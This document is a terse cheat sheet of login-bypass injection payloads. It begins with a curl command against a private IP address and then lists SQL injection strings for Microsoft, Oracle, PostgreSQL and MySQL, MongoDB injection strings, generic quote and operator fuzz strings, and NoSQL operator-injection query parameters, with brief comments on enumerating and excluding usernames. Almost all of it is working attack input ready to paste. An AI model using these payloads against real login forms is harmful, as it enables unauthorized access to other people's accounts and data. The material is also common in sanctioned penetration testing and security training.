Login bypass

#With curl

#Use -I flag
curl -I  "http://192.168.101.105/item/viewItem.php?id=5" 

#Try:

whatever' or '1'='1

' or '1'='1
-----------------------------------

#Microsoft, Oracle, PostgreSQL

admin'--
admin' or 1=1--
admin' or '1'='1'--

admin}" or 1=1--

----------------------------------

#MongoDB specific Injection

' || 1==1 %00
admin' || 1==1//
admin' || 1==1%00
admin' || '1==1
admin' || '1'=='1

----------------------------------

MySQL

admin'-- -
admin'#

admin' or 1=1#
admin' or 1=1-- -

admin' or '1'='1'-- -
admin' or '1'='1'#

admin}" or 1=1-- -

----------------------------------

#Extra stuff

-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x


----------------------------

Operators

# $ne: Not equal
username[$ne]=xyz&password[$ne]=xyz

# $regex: Regular expressions
username[$regex]=.*&password[$regex]=.*
username[$regex]=^xyz&password[$regex]=^xyz
username[$regex]=^a.*$&password[$ne]=xyz
username[$regex]=.{6}&password[$ne]=xyz
username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values

# $exists: Exists in the database
username[$exists]=true&password[$exists]=true

# $nin: Not include
username[$nin][admin]=admin&password[$ne]=xyz
# If we found the "admin" exists, we can exclude "admin" by specifying $nin operator.
username[$nin][]=admin&password[$ne]=xyz
# If more users are found, we can exclude the user.
username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz

# $gt: Greater than
username[$gt]=s&password[$gt]=s
# $lt: Lower than
username[$lt]=s&password[$lt]=s

# Combinations
username[$ne]=xyz&password[$regex]=.*
username[$exists]=true&password[$ne]=xyz
username[$ne]=xyz&password[$exists]=true
username[$regex]=.*&password[$ne]=xyz
username[$ne]=xyz&password[$regex]=.*
username[$regex]=.{6}&password[$ne]=xyz